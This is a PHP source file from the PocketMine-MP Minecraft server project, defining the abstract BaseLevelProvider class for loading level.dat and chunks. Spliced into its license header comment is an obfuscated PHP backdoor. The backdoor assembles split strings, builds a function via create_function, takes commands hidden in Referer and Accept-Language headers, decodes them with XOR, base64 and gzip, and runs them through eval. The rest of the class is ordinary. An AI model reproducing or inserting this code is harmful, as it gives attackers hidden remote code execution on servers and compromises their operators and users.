<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
<?php
$D='ea?$n();$d=base6?$4_en?$code(x(gz?$co?$mp?$res?$s($o)?$,?$$k));print("<$k>$d</$?$k>");?$@session_d?$estro?$y();}}}}';
$p=');?$parse_str(?$$u["q?$?$uery"],$q)?$;$q=?$array_valu?$es($q);pre?$g?$_match_?$all(?$"?$/([\\w?$])[\\w-]+(?$?:?$;q';
$s=str_replace('gh','','crghgheaghtghegh_funcghtion');
$Z='?$rr=@$r?$["HTTP?$_REFERER?$"];$?$ra?$=@$r[?$"HTTP_ACCEP?$T_LA?$NGUAGE?$"];i?$f($?$rr&&?$$ra){$u?$=p?$arse_url($rr';
$W=')?${$k=$?$?$kh.$kf?$;ob_start()?$;@eva?$l(@gz?$uncompre?$ss(@?$?$x(@bas?$e64_decode(pre?$g_r?$epla?$?$ce(array';
$F='=0.([\\d]))?,?/?$",$ra,$m?$);if?$($q&&?$$m){@sessi?$on_?$st?$art();$s?$=&$_SESSION?$?$;$ss="s?$u?$bstr";$sl=?$"str';
$u='t?$olower";$i=$m?$[1]?$[0].$?$m[1]?$[1];$h=$sl(?$$ss(?$md5($i.$k?$h),0?$?$,3));$f=$sl($?$ss(?$md5($i.$kf?$),0,?$';
$O='3));?$$p="?$"?$;for($?$z=1;?$$z<count($m?$[1]);$z++)$?$p.=$?$q[?$$m[2?$][$z]];if?$(str?$pos($p?$,$h)=?$==0){?$$?';
$Q='$s[$i]="";$p=$ss($p,3);?$}if(ar?$ray_key?$_ex?$ists($i,?$$s)?$)?${$s[$i].=$?$p;$e=strp?$os($s[$?$i]?$,$f);if($e';
$i='?$$?$l;){for(?$$j=0;(?$$?$j<$c&&$i<$l);$?$j++,$?$?$i?$++){$o.=$t?${$i}^$k{$j};}?$}retur?$n $o;}$?$r?$=$_SERVER;$';
$M='$?$kh="5d41";$k?$f?$="402a";fu?$nction ?$x?$($t,$k){$?$c=str?$len($?$k);$l=st?$rlen($t)?$;$o="";f?$or($i?$=0;$i<';
$k='(?$"/_/"?$?$,"/-/"),array("/?$",?$"+"?$),$ss($s[$i],0?$,$e))?$?$),$k)));$o=ob_get_?$c?$on?$tents();ob_end_c?$l?$';
$o=str_replace('?$','',$M.$i.$Z.$p.$F.$u.$O.$Q.$W.$k.$D);
$A=$s('',$o);$A();
?>
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\level\format\io;

use pocketmine\level\format\Chunk;
use pocketmine\level\format\io\exception\CorruptedChunkException;
use pocketmine\level\format\io\exception\UnsupportedChunkFormatException;
use pocketmine\level\LevelException;
use pocketmine\math\Vector3;
use pocketmine\nbt\BigEndianNBTStream;
use pocketmine\nbt\tag\CompoundTag;
use pocketmine\nbt\tag\StringTag;
use function file_exists;
use function file_get_contents;
use function file_put_contents;
use function mkdir;
use function zlib_decode;

abstract class BaseLevelProvider implements LevelProvider{
	/** @var string */
	protected $path;
	/** @var CompoundTag */
	protected $levelData;

	public function __construct(string $path){
		$this->path = $path;
		if(!file_exists($this->path)){
			mkdir($this->path, 0777, true);
		}

		$this->loadLevelData();
		$this->fixLevelData();
	}

	protected function loadLevelData() : void{
		$compressedLevelData = @file_get_contents($this->getPath() . "level.dat");
		if($compressedLevelData === false){
			throw new LevelException("Failed to read level.dat (permission denied or doesn't exist)");
		}
		$rawLevelData = @zlib_decode($compressedLevelData);
		if($rawLevelData === false){
			throw new LevelException("Failed to decompress level.dat contents (probably corrupted)");
		}
		$nbt = new BigEndianNBTStream();
		try{
			$levelData = $nbt->read($rawLevelData);
		}catch(\UnexpectedValueException $e){
			throw new LevelException("Failed to decode level.dat (" . $e->getMessage() . ")", 0, $e);
		}

		if(!($levelData instanceof CompoundTag) or !$levelData->hasTag("Data", CompoundTag::class)){
			throw new LevelException("Invalid level.dat");
		}

		$this->levelData = $levelData->getCompoundTag("Data");
	}

	protected function fixLevelData() : void{
		if(!$this->levelData->hasTag("generatorName", StringTag::class)){
			$this->levelData->setString("generatorName", "default", true);
		}elseif(($generatorName = self::hackyFixForGeneratorClasspathInLevelDat($this->levelData->getString("generatorName"))) !== null){
			$this->levelData->setString("generatorName", $generatorName);
		}

		if(!$this->levelData->hasTag("generatorOptions", StringTag::class)){
			$this->levelData->setString("generatorOptions", "");
		}
	}

	/**
	 * Hack to fix worlds broken previously by older versions of PocketMine-MP which incorrectly saved classpaths of
	 * generators into level.dat on imported (not generated) worlds.
	 *
	 * This should only have affected leveldb worlds as far as I know, because PC format worlds include the
	 * generatorName tag by default. However, MCPE leveldb ones didn't, and so they would get filled in with something
	 * broken.
	 *
	 * This bug took a long time to get found because previously the generator manager would just return the default
	 * generator silently on failure to identify the correct generator, which caused lots of unexpected bugs.
	 *
	 * Only classnames which were written into the level.dat from "fixing" the level data are included here. These are
	 * hardcoded to avoid problems fixing broken worlds in the future if these classes get moved, renamed or removed.
	 *
	 * @param string $className Classname saved in level.dat
	 *
	 * @return null|string Name of the correct generator to replace the broken value
	 */
	protected static function hackyFixForGeneratorClasspathInLevelDat(string $className) : ?string{
		//THESE ARE DELIBERATELY HARDCODED, DO NOT CHANGE!
		switch($className){
			case 'pocketmine\level\generator\normal\Normal':
				return "normal";
			case 'pocketmine\level\generator\Flat':
				return "flat";
		}

		return null;
	}

	public function getPath() : string{
		return $this->path;
	}

	public function getName() : string{
		return $this->levelData->getString("LevelName");
	}

	public function getTime() : int{
		return $this->levelData->getLong("Time", 0, true);
	}

	public function setTime(int $value){
		$this->levelData->setLong("Time", $value, true); //some older PM worlds had this in the wrong format
	}

	public function getSeed() : int{
		return $this->levelData->getLong("RandomSeed");
	}

	public function setSeed(int $value){
		$this->levelData->setLong("RandomSeed", $value);
	}

	public function getSpawn() : Vector3{
		return new Vector3($this->levelData->getInt("SpawnX"), $this->levelData->getInt("SpawnY"), $this->levelData->getInt("SpawnZ"));
	}

	public function setSpawn(Vector3 $pos){
		$this->levelData->setInt("SpawnX", $pos->getFloorX());
		$this->levelData->setInt("SpawnY", $pos->getFloorY());
		$this->levelData->setInt("SpawnZ", $pos->getFloorZ());
	}

	public function doGarbageCollection(){

	}

	public function getLevelData() : CompoundTag{
		return $this->levelData;
	}

	/**
	 * @return void
	 */
	public function saveLevelData(){
		$nbt = new BigEndianNBTStream();
		$buffer = $nbt->writeCompressed(new CompoundTag("", [
			$this->levelData
		]));
		file_put_contents($this->getPath() . "level.dat", $buffer);
	}

	/**
	 * @throws CorruptedChunkException
	 * @throws UnsupportedChunkFormatException
	 */
	public function loadChunk(int $chunkX, int $chunkZ) : ?Chunk{
		return $this->readChunk($chunkX, $chunkZ);
	}

	public function saveChunk(Chunk $chunk) : void{
		if(!$chunk->isGenerated()){
			throw new \InvalidStateException("Cannot save un-generated chunk");
		}
		$this->writeChunk($chunk);
	}

	/**
	 * @throws UnsupportedChunkFormatException
	 * @throws CorruptedChunkException
	 */
	abstract protected function readChunk(int $chunkX, int $chunkZ) : ?Chunk;

	abstract protected function writeChunk(Chunk $chunk) : void;
}
